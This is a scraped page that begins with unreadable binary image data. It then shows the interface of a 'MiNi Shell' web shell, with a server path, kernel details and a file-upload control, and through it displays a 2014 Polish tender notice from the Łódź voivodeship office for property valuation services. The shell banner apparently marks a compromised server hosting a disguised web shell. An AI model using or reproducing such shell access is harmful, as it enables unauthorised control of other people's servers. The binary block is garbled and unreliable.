JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140429/144634-N-2014.html

<p class="kh_header"><b>Łódź: Wykonanie operatów szacunkowych</b><br>
<b>Numer ogłoszenia: 144634 - 2014; data zamieszczenia: 29.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Łódzki Urząd Wojewódzki w Łodzi , ul. Piotrkowska 104, 90-926 Łódź, woj. łódzkie, tel. 042 6641526, 6641210, faks 042 6641112.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodz.uw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie operatów szacunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa określenia wartości nieruchomości w formie operatów szacunkowych. CPV 71354300-7 (usługi badań katastralnych).
2.  Przedmiot zamówienia dotyczy;
  1) sukcesywnego wykonywania  wycen nieruchomości: 
a) w skład której wchodzą działki niezabudowane,  w formie jednostkowego operatu;
b) w skład której wchodzą: przynajmniej jedna działka zabudowana budynkiem lub budynkiem mieszkalnym jednorodzinnym, w rozumieniu ustawy z dnia 7 lipca 1994 r. prawo budowlane (tj. Dz. U.  z 2013 r., poz. 1409 ze zmianami) lub działki niezabudowane i przynajmniej jedna działka zabudowana budynkiem lub budynkiem mieszkalnym jednorodzinnym, w rozumieniu wyżej powołanej ustawy,  w formie jednostkowego operatu.
  2)  wykonywania inwentaryzacji nieruchomości:
a) w skład której wchodzą działki niezabudowane,  
b) w skład której wchodzą: przynajmniej jedna działka zabudowana budynkiem lub budynkiem mieszkalnym jednorodzinnym, w rozumieniu ustawy z dnia 7 lipca 1994 r. prawo budowlane (tj. Dz. U.  z 2013 r., poz. 1409 ze zmianami) lub działki niezabudowane i przynajmniej jedna działka zabudowana budynkiem lub budynkiem mieszkalnym jednorodzinnym, w rozumieniu wyżej powołanej ustawy.  
3.  Przedmiot zamówienia dotyczy nieruchomości na terenie województwa łódzkiego, które obejmują między innymi działki zgodnie z poniższym wyszczególnieniem:
Obr. G -11 Łódź, dz. nr 88/8, 87/8, 234/9, 234/12, 234/20, 235/2, 234/17, 234/2, 64/48, 190/21, 225/3;
Obręb G-25, Łódź- Górna, dz. nr 40, 5/1, 8/14, 8/13, 7/2
Obręb G-44, Łódź- Górna, dz. nr 1/5, 1/6, 87/3, 431/15, 431/17, 436/4, 444/53, 444/55, 93/4, 144/4, 130/2,133/4, 134/2, 137/5, 138/5, 139/1, 140/6, 352/12, 2/2, 2/3, 8/8, 8/9, 346/58, 151/12,
Obręb B-44 Łódź, dz. nr 2/8; 
Obręb Bądków, gm. Zgierz, pow. zgierski, dz. nr 51/1, 54/1, 152/1, 1/1
Obręb Bogumiłowice, gm. Sulmierzyce, pow. pajęczański, dz. nr 205/1, 165/1, 249/1, 166/1, 211/1, 212/1, 213/1, 213/3, 246/1, 168/1, 283/3, 248/1
Obręb Celestynów, gm. Ozorków, pow. zgierski, dz. nr 267/1, 268/1
Obręb Chechło II, gm. Dobroń, pow. pabianicki, działka nr 94/2
Obręb 7 Czarna,  gm. Złoczew, pow. sieradzki, działka nr 62/3
Obręb Dęborzeczka, gm. Poświętne, pow. opoczyński, dz. nr 1, 10/1, 11/1, 12/2, 15/2, 22/2, 25/2, 26/2, 64/1, 65/1, 20/2, 21/2, 494/1, 19/2, 491/1, 493/3, 515, 496/1, 518/2, 497/1, 498/1, 70/1, 29/2, 523/2, 421/1, 426/1, 426/3, 28/2, 500/1, 522/2,33/2, 63/1, 429/2, 716/2, 520/2, 23/2, 14/2, 427/2, 68/1, 67/1, 428/2, 13/2, 425, 24/2, 519/2, 513, 514;
Obręb Gojść Ważne Młyny, gm. Nowa Brzeźnica, pow. pajęczański,  dz. nr 474/1
Obręb Inowłódz, gm. Inowłódz, pow. tomaszowski, dz. nr 4004/1, 2237/6, 2318/1, 2240/4, 2240/5, 2319/1; 2524/4, 2321/1, 2397/1, 2526/4, 2564/4, 4010/1, 2322/1, 2326/1, 2331/1, 2532/4, 2381/1, 2394/1, 2393/1, 2399/1, 2406/1, 2407/1, 2409/1, 2411/1, 2421/1, 2521/4, 2528/4, 2337/1, 1722/2, 2516/4, 2517/4, 2523/4, 1740/2, 2323/1, 2529/4, 2530/4, 2533/4, 2547/4, 2563/4, 2566/4, 2549/4, 2550/4, 2551/4, 2552/4, 2548/4, 2574/2, 3301/1, 3302, 2576/2, 2652/2, 4411/1, 4007/1, 2558/4, 2557/4, 4154/2, 4018/1, 2585/2, 2413/1, 2650/2, 2630/2, 2649, 2335/1, 2546/4, 2632/2, 4209/1, 4174/2, 4017/1, 2577/2, 2651/2, 2553/4, 2559/10, 4157/2, 4376/2,4376/3,4364/1, 4364/3, 4365/1, 4366/1, 4367/1,4368/1, 4369/1, 4370/1,4371/1,4372/1,4373/1, 4374/2,4375/2, 4375/3, 3298/1
Obręb Kębliny, gm. Zgierz, pow. zgierski,  dz. nr 228/1, 265/1, 379/1 
Obręb Kraśnica, gm. Opoczno, pow. opoczyński,  dz. nr 1178/1, 1179/2, 1180/1, 1184/1, 1185/2, 1186/2, 1187/1,  1191/1, 1197/1; 
Obręb Kolonia Kruszewiec, gm. Opoczno, pow. opoczyński, dz. nr 296/2 
Obręb Kodrąb, gm. Kodrąb, pow. radomszczański, dz. 423/8
Obręb Komorów, gm. Tomaszów Maz., pow. tomaszowski, dz. 566/1
Obręb Korytnica, gm. Sulejów, pow. piotrkowski, działka nr 59/3, 59/5,
Obręb Kuźnica, gm. Nowa Brzeźnica, pow. pajęczański, dz. nr: 1443/1, 1369/1, 1323/1.
Obręb Maszkowice, gm. Ozorków, pow. zgierski, dz. nr 99/1, 216/1, 330/1, 415/1
Obr. 24 Mnichów, gm. Sieradz, pow. sieradzki, działka nr 339/2, 41, 42/2, 140/2
Obr. Modlna, gm. Zgierz, dz. nr 452/17 
Obręb Niedrzew II, gm. Strzelce, pow. kutnowski, dz. nr 223
Obręb Niedrzew I, gm. Strzelce, pow. kutnowski,  dz. nr 24/15, 70/1
Obręb Niesułków Kolonia, gm, Stryków, pow. zgierski, dz. nr 264/1
Obr. P-8 m. Pabianice, dz. nr 275/1
Obręb 17 Petrykozy, gm. Pabianice,  pow. pabianicki, dz. 121/6
Obręb 3 m. Rawa Mazowiecka, działka nr 159/1, 140, 160/1 
Obręb 16 Rogów PGR, gm. Tomaszów Maz., pow. tomaszowski, działka nr 26/2
Obr. 101401_1.0004 m. Sieradz, działka nr 18/2, 18/3
Obręb 10 m. Sieradz, dz. nr 389/1
Obręb 3 Skierniewice, dz. nr 381/5, 412/10,
Obręb Smardzew, gm. Wróblew, pow. sieradzki, dz. nr 344/3
obręb Sokolniki, gm. Ozorków, pow. zgierski, dz. nr 355/1, 371/1
obręb Sójki, gm. Strzelce, pow. kutnowski, dz. nr 151/2
Obręb Stróża, gm. Rząśnia, pow. pajęczański, dz. nr 798/4
Obr. 34 Sucha, gm. Sieradz, pow. sieradzki, działka nr 155/2, 336/2
Obr. 8 m. Sulejów, pow. piotrkowski, działka nr 437/3; 
Obręb Szczercowska Wieś, gm. Szczerców, pow. bełchatowski, dz. 344/11, 420/1, 421/1, 431/1, 429/2, 430
Obręb Tobiasze Ojrzanów, gm. Ujazd, pow. tomaszowski, dz. nr 71/1, 289/1, 95/4, 94/4, 145/1, 248/1, 147/1, 158/1, 159/5, 162/1, 245/1, 247/1, 76/1, 255/1, 281/1, 285/1 ,282/1, 286/1
Obręb Wola Raciborowska, gm. Strzelce, pow. kutnowski,  dz. nr 71/3, 180/2, 188/2
Obręb Wola Wydrzyna, gm. Sulmierzyce, pow. pajęczański, dz. nr 16/1, 26/1, 55/1, 21/3, 39/1,41/1, 41/3, 56/1, 17/1, 20/1, 25/1, 32/1, 40/1, 19/1, 31/1, 31/3
Obręb Wykno, gm. Ujazd, pow. tomaszowski, działka nr 244/2, 132/2, 136/2, 130/2, 147/2, 383/2, 205/3;
Obręb Zaosie, gm. Ujazd, pow. tomaszowski, działka nr 99/1, 89/1, 9/1, 13/1,7/4, 172/1, 3/1, 159/4, 175/3, 4/10, 2/1, 12/8, 12/10, 11/1, 10/1, 8/8, 8/6, 6/1, 5/1, 22/1, 21/3, 18/1, 17/1,15/3, 14/4, 83/5, 82/6, 83/3, 79/1, 82/1, 81/1, 80/1, 47/3, 46/1,44/5, 44/3, 41/1, 39/1, 84/3, 85/3, 86/3, 86/5, 113/2, 114/8, 186/1, 87/3, 88/1, 91/5, 92/3, 93/4, 93/6, 94/1, 95/1, 96/1, 104/3, 4/8, 4/6, 87/5,185/1, 321/2,322/1, 111/2, 97/1;
Obręb 8 m. Złoczew, pow. sieradzki, dz. 108/1, 77/2, 78/2.
Powyższy wykaz stanowi część przedmiotu zamówienia. Pełny zakres zamówienia Zamawiający uzależnia od ilości i treści decyzji o zezwoleniu na realizację inwestycji drogowych, ostateczności decyzji o ustaleniu lokalizacji celu publicznego oraz innych czynników uniemożliwiających obecnie określenie wszystkich nieruchomości stanowiących przedmiot zamówienia. Ze względu na fakt, iż Zamawiający nie może przewidzieć zleceń, co do terminu ich realizacji jak i pełnego przedmiotu zamówienia, Zamawiający każdorazowo szczegółowo określi ww. elementy  w poszczególnym zleceniu.
4.  Zamawiający przewiduje zlecenie w całym okresie trwania umowy minimum 300 wycen nieruchomości.
5. Zamawiający przewiduje możliwość wykonania w miesiącu do 60 wycen. Zamawiający zastrzega sobie prawo do zwiększenia ilości zleconych operatów w miesiącu do 200%.
6. Zamawiający zastrzega, iż mogą zdarzyć się miesiące, w których nie będzie zleceń wykonania operatów szacunkowych.
7. Zamawiający zastrzega, iż ilości operatów szacunkowych do wykonania  nie są obligatoryjne, a stanowią jedynie przewidywaną do wykonania maksymalną ilość operatów szacunkowych zamówienia. 
8. Zamówienie obejmuje:
  1) wykonanie wycen nieruchomości w formie operatów szacunkowych na potrzeby postępowań administracyjnych dotyczących ustalenia wysokości odszkodowania za nieruchomości objęte poszczególnymi decyzjami lokalizacyjnymi lub decyzjami zezwalającymi na realizację inwestycji w zakresie dróg publicznych, linii kolejowych, lotnisk, budowli przeciwpowodziowych;
  2) wykonanie wycen nieruchomości na potrzeby postępowań administracyjnych dotyczących ustalenia wysokości odszkodowania z tytułu szkód oraz utraty wartości nieruchomości powstałej w wyniku ograniczenia sposobu korzystania  z nieruchomości;
  3) wykonanie wycen nieruchomości w formie operatów szacunkowych dotyczących ustalenia wysokości odszkodowania w ramach przyznania nieruchomości zamiennej;
  4) wykonanie inwentaryzacji nieruchomości;
  5) wykonanie wycen nieruchomości gruntowych (zabudowanych lub niezabudowanych) oraz budynków, innych urządzeń i lokali dla potrzeb postępowań uwłaszczeniowych;
  6) wykonanie wycen nieruchomości dla potrzeb zaspokajania roszczeń związków wyznaniowych.
9. Celem wyceny jest:
  1) ustalenie wysokości odszkodowania za nieruchomości przeznaczone  na realizację inwestycji w zakresie dróg publicznych, linii kolejowych, lotnisk, budowli przeciwpowodziowych;
  2) ustalenie wysokości odszkodowania z tytułu szkód albo utraty wartości nieruchomości powstałych w wyniku ograniczenia sposobu korzystania  z nieruchomości położonych poza liniami rozgraniczającymi teren inwestycji w celu dokonania przebudowy urządzeń infrastruktury technicznej;
  3) ustalenia wysokości odszkodowania w ramach przyznania nieruchomości zamiennej;
  4) ustalenie wartości nieruchomości gruntowej (zabudowanej lub niezabudowanej) oraz budynków, innych urządzeń i lokali dla potrzeb postępowania uwłaszczeniowego;
  5) ustalenie wartości nieruchomości dla potrzeb zaspokajania roszczeń związków wyznaniowych.
10. Przez nieruchomość zabudowaną należy rozumieć nieruchomość, w skład której wchodzi przynajmniej jedna działka zabudowana (wskazana w zamówieniu) budynkiem lub budynkiem mieszkalnym jednorodzinnym, w rozumieniu ustawy  z dnia  7 lipca 1994 r. prawo budowlane (tj. Dz. U. z 2013 r., poz. 1409 ze zmianami) lub działki niezabudowane i przynajmniej jedna działka zabudowana (wskazane                       w zamówieniu) budynkiem lub budynkiem mieszkalnym jednorodzinnym,  w rozumieniu wyżej powołanej ustawy.
11. Pod pojęciem wyceny nieruchomości należy rozumieć określenie wartości nieruchomości, jako przedmiotu prawa własności i/lub innych praw do nieruchomości, i/lub praw wynikających z ustawy o rodzinnych ogrodach działkowych, oraz określenie wartości szkód i utraty wartości  nieruchomości mających związek z ograniczeniem sposobu korzystania z nieruchomości położonych poza liniami rozgraniczającymi teren inwestycji w celu dokonania przebudowy infrastruktury technicznej, sporządzone              w formie operatu szacunkowego.
12. Zamawiający wymaga, aby operaty  wykonano zgodnie z: 
  1) ustawą z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jedn.: Dz. U. z 2014 r. poz. 518);
  2) rozporządzeniem Rady Ministrów z dnia 21 września 2004 r. w sprawie wyceny nieruchomości i sporządzania operatu szacunkowego (Dz. U. z 2004 r. Nr 207, poz. 2109 z późn. zm.);
  3) rozporządzeniem Rady Ministrów z dnia 10 lutego 1998 r. w spawie przepisów wykonawczych dotyczących uwłaszczenia osób prawnych nieruchomościami będącymi dotychczas w ich zarządzie lub użytkowaniu (Dz. U. z 1998 r. Nr 23, poz. 1099 z późn. zm.);
  4) Powszechnymi Krajowymi Zasadami Wyceny (Wyd. PFSRM); 
  5) innymi przepisami obowiązującymi w tym zakresie.
13. Zamawiający wymaga, aby operaty zawierały:
  1) zestawienie transakcji nieruchomości podobnych stanowiących podstawę wyceny, z podaniem nazwy ulicy, powierzchni, obrębu, daty transakcji (w formacie: dd/mm/rrrr.); na żądanie Zamawiającego wynikające z potrzeby oceny dowodu w postępowaniu administracyjnym, do którego sporządzony został operat szacunkowy, Wykonawca przekaże dodatkowe informacje, w pełni identyfikujące transakcje i nieruchomości porównawcze, w szczególności nr aktu notarialnego oraz nr ewidencyjny działki;
  2) dokumentację fotograficzną nieruchomości. Jeśli nieruchomość składa się z więcej niż jednej działki wykonawca zobowiązany jest dołączyć do każdego operatu dokumentację fotograficzną każdej z nich. W przypadku gdy operat dotyczy nieruchomości zabudowanej dokumentacja fotograficzna powinna obejmować  każdy budynek. Ponadto dokumentacja ta powinna posiadać opis, której części  nieruchomości 

dotyczy albo budynku;
  3) protokół z oględzin nieruchomości zgodny ze wzorem stanowiącym załącznik do umowy;
  4) w wyciągu z operatu szacunkowego ogólną wartość nieruchomości z wyszczególnieniem wartości części składowych nieruchomości (w przypadku określenia wartości odtworzeniowej nieruchomości), tj. wartości nasadzeń roślinnych, wartości naniesień budowlanych, wartości gruntu oraz wartości ograniczonych praw rzeczowych;
  5) istotne dokumenty wykorzystane przy jego sporządzeniu;
  6) informację o sposobie powiadomienia stron wskazanych w zleceniu o miejscu i terminie przeprowadzenia oględzin;
  7) zaświadczenie o przeznaczeniu nieruchomości wynikającym z dokumentu planistycznego albo wypis z badania dokumentów planistycznych;
  8) załącznik zlecenia dotyczący danego operatu.
14. Wykonawca w zakresie sporządzonych przez siebie operatów szacunkowych zobowiązany jest do udziału w rozprawach administracyjnych i w postępowaniach przed organem odwoławczym lub w uzasadnionych przypadkach do sporządzenia odpowiedniej opinii, celem wykorzystania jej przez Zamawiającego w postępowaniach odwoławczych na pisemny wniosek Zamawiającego oraz udzielania pisemnych wyjaśnień na wniosek strony postępowania, bez dodatkowego wynagrodzenia.
15. Wykonawca zobowiązany jest do potwierdzenia aktualności wykonanego operatu szacunkowego po upływie 12 miesięcy od dnia jego sporządzenia w terminie 14 dni od daty wystąpienia z takim wnioskiem przez Zamawiającego w przypadku nie stwierdzenia znaczących różnic cen rynkowych nieruchomości. Potwierdzenie aktualności operatu szacunkowego będzie dokonane bez dodatkowego wynagrodzenia.
16. W przypadku zaistnienia okoliczności powodujących zmianę sytuacji rynkowej nieruchomości lub w przypadku zmiany przepisów prawa rzutujących na sposób wyceny, które wymagać będą aktualizacji operatu szacunkowego lub ponownej wyceny nieruchomości, Wykonawca dokona takiej czynności w ciągu 14 dni od daty przekazania mu takiego wniosku przez Zamawiającego. Z powyższym wnioskiem Zamawiający może wystąpić do Wykonawcy w okresie 24 miesięcy od daty sporządzenia operatu. Wykonawca dokona takiej czynności w ciągu 14 dni od daty odbioru wniosku od Zamawiającego, bez dodatkowego wynagrodzenia.
17. Wykonawca w zakresie sporządzonych przez siebie operatów szacunkowych zobowiązany jest na pisemny wniosek Zamawiającego, bez dodatkowego wynagrodzenia, do sporządzenia ponownej wyceny nieruchomości w sytuacji, kiedy podstawą uchylenia decyzji o ustaleniu i wypłacie odszkodowania przez organ wyższej instancji lub sąd jest (w ocenie organu wyższej instancji lub sądu) wadliwie sporządzona wycena nieruchomości.
18. Wykonawca zobowiązany jest do dokonania oględzin nieruchomości i poinformowania o nich  jej właściciela lub osoby, w posiadaniu której znajduje się nieruchomość w dniu oględzin.  
19. Wykonawca zobowiązany jest do sporządzenia inwentaryzacji nieruchomości w przypadku przeszkód w wykonaniu operatu szacunkowego w formie protokołu wraz z dokumentacją fotograficzną.
20. Każde zamówienie Wykonawca będzie zobowiązany wykonać w jednym egzemplarzu, w formie papierowej (wydruk A4 umieszczony w plastikowej teczce umożliwiającej dołączenie do akt sprawy), używając własnych materiałów  i narzędzi.
21. W przypadku, gdzie Wykonawcą jest Konsorcjum, reprezentant Konsorcjum ma obowiązek wyznaczenia osoby spośród członków Konsorcjum do wykonania Operatu. Odpowiedzialność za prawidłowe wykonanie operatu ponosi członek Konsorcjum, który wykonał operat.
22. W przypadku zaistnienia konieczności wykonania operatów szacunkowych, obejmujących wycenę nieruchomości o szczególnym charakterze (stacja benzynowa, hotel, itp.), za podstawę rozliczeń będzie przyjmowana stawka roboczogodziny. Ilość godzin potrzebna na wykonanie tych opracowań wymaga akceptacji Zamawiającego przed przyjęciem zlecenia do realizacji. Ostateczne rozliczenie faktycznej ilości godzin, która nie może być większa niż zaakceptowana przez Zamawiającego, nastąpi  na podstawie faktury VAT.
23. Zamawiający przewiduje, że nieruchomości zabudowane stanowić będą 5% całości zamówienia, a nieruchomości niezabudowane 95% całości zamówienia.
24. Zamawiający dopuszcza możliwość powierzenia wykonania zamówienia przez podwykonawców zastrzegając, iż przy odbiorze przedmiotu zamówienia może żądać przedstawienia przez Wykonawcę dokumentów potwierdzających odpowiednie uprawnienia podwykonawcy. Wykonawca ponosi pełną odpowiedzialność za prawidłowe wykonanie Operatu.
25. Do zawarcia przez Wykonawcę umowy z podwykonawcami wymagana jest zgoda Zamawiającego.
26. Zamawiający nie dopuszcza możliwości składania ofert częściowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.35.43.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 4 000,00 zł (słownie złotych: cztery tysiące 00/100).
2.   Wadium może być wnoszone w jednej lub kilku następujących formach:
1) Pieniądzu;
2) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) Gwarancjach bankowych;
4) Gwarancjach ubezpieczeniowych;
5) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 
9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z późn. zm.).
3.   Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: NBP Oddział Okręgowy 
w Łodzi 77 1010 1371 0097 0013 9120 0000.
4.   Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę odpowiadającą swoim rodzajem i wartością, usłudze stanowiącej przedmiot zamówienia, tj. określenia wartości nieruchomości w formie operatów szacunkowych w ilości (jednorazowo) minimum 20 operatów szacunkowych miesięcznie o wartości min. 6 000 zł brutto, poprzez złożenie dokumentów, o których mowa w rozdz. VI ust. 1 i 3 SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, jeżeli wykaże, że dysponuje co najmniej dwiema osobami posiadającymi uprawnienia rzeczoznawcy majątkowego, w rozdz. VI ust. 1, 4 i 5 SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, poprzez złożenie dokumentów, o których mowa w rozdz. VI ust. 1 i 6 SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

